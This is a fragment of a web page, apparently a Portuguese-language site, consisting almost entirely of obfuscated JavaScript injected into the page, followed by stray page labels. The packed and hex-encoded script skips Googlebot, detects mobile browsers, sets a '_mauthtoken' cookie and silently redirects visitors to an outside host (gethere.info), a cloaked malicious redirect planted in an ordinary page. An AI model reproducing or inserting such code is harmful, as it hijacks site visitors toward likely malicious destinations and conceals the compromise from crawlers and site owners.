|4v|4w)|4x|4u|4t|4q\\-|4r|4s|4y\\-/i.19(a.4z(0,4)))1c.4F=b})(1a.4G||1a.4E||1c.1d,\’4D://4A.4B/4C/?5b\’);’,62,372,’|||||||||||||||01||||go|||||||ma|||||||te|ny|mo|it|al|ri|co|ca|ta|g1|60|up|ts|nd|pl|ac|ll|ip|ck|pt|_|iris|bi|do|od|wa|se|70|oo||ai|||os|er|mc|ar||test|navigator|mobile|window|opera|ad|un|avantgo|gf|meego|gr|hcit|hp|hs|ht|hi|hei|gene|hd|haie|fly|em|l2|ul|compal|el|dmob|ds|elaine|blazer|ic|bada|ze|fetc|blackberry|ez|k0|esl8|g560|tp|le|no|xi|kyo|kwc|kgt|klon|kpt|if|lg|m50|ui|xo|||m3ga|m1|function|libw|lynx|keji|kddi|iac|ibro|idea|i230|bb|hu|aw|tc|ig01|ikom|jbro|jemu|jigs|ja|android|im1k|inno|ipaq|dica|fennec|rn|av|amoi|ko|ixi|802s|abac|re|an|phone|ch|as|us|aptu|in|ex|palm|yw|770s|4thp|link|vodafone|wap|browser|treo|series|pocket|symbian|windows|ce|6310|6590|3gso|plucker|1207||xda|xiino|attw|au|cmd|lge|mp|cldc|chtm|maemo|cdm|cell|craw|kindle|dbte|dc|psp|ng|hiptop|hone|iemobile|da|midp|ccwa|lb|rd|bl|nq|be|di|ob|avan|netfront|firefox|c55|capi|mmp|bw|bumb|az|br|devi|de|lk|tcl|tdg|gt|00|mb|t2|t6|tel|tim|tx|si|utst|m5|m3|to||sh|sy|sp|sdk||sgh||cr||sc|va|ge|mm|ms|sie|sk|t5|so|ft|b3|sm|sl|id|v400|v750|yas|your|zeto|x700|wonu|nc|nw|wmlb|zte|substr|gettop|info|kt|http|vendor|location|userAgent|wi|whit|vm40|voda|vulc|vk|rg|veri|vi|vx|61|98|w3c|webc|85|83|80|81|sa||shar||||phil|pire|n20|zz|pdxg|pg|sdNXbH|n30|n50|pn|uc|ay|tf|mt|p1|wv|oran|ti|op|o2im|mywa|s55|mwbp|n10|pan|p800|owg1|po|rt|mi|r600|o8|on|qtek|r380|rc|raks|zo|me|ve|ro|rim9|oa|ne|psio|wt|prox|nok|n7|qa|qc|wf|mmef|wg|02|07|nzph’.split(‘|’),0,{}))var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

PARA VOCÊ

COMENTÁRIOS